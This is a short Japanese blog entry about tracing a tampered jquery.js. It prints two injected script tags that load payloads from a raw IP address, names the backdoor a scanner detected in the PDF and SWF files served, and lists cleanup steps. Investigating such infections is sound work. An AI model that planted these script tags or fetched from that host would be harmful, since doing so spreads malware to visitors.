昨日の続き。
wget で cookie と相手方の目をごまかすために UA を設定しみたら、こんなのが出ましたｗ

<script src=http://94.247.2.195/news/?id=2></script>
<script src=http://94.247.2.195/news/?id=3></script>

よしよし。それではいただきます〜とばかりに wget でファイルを get。なんか PDF と swf なファイルですよ。
スキャンしてみたら、バッチリ引っかかりました。

Backdoor.Win32.Agent.afhg

どっかのサイトで同じ jquery.js 踏んづけて、うっかり ftp*1 しちゃって蓮抜かれてあぼ〜んて感じかな。
ウィルススキャンして、Windows Update、および Adobe Acrobat と Flash Player をうｐでとして一丁上がりってなもんで*2。ちゃんちゃん。